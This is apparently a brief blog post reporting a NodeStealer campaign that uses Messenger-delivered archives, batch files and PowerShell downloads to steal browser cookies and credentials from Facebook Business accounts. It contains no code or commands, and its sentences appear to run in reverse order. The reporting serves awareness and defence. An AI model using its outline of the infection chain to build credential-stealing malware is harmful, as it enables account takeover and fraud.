![]() It is crucial for Facebook Business account owners to exercise caution and avoid downloading suspicious files or clicking on unknown links. ![]() This campaign may be a prelude to a more targeted attack in the future. The stolen credentials and cookies can be used by the attackers to take control of Facebook accounts and carry out fraudulent transactions using legitimate business pages. ![]() The variant of NodeStealer used in this campaign is more advanced than previous versions, using batch files to download and execute Python scripts, stealing credentials and cookies from multiple browsers and websites. In the background, a PowerShell command downloads additional payloads, including the Python interpreter and the NodeStealer malware. Once executed, the archive files open the Chrome web browser and redirect the victim to a benign webpage. The malware payload file disguises itself as an image of a defective product, enticing Facebook business page owners to download it. These attackers use fraudulent messages sent via Facebook Messenger to deliver the credential theft malware in ZIP or RAR archive files. Recently, Netskope Threat Labs revealed that Vietnamese threat actors are behind the attacks, using tactics similar to other adversaries in the same region. The NodeStealer malware, first discovered by Meta in May 2023, is a JavaScript-based malware that steals cookies and passwords from web browsers, compromising accounts on platforms like Facebook, Gmail, and Outlook. ![]() The attackers mainly focus on victims in southern Europe and North America, particularly in the manufacturing, services, and technology sectors. An ongoing campaign is targeting Facebook Business accounts with malicious messages in an attempt to steal victims’ credentials and potentially take over their accounts.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |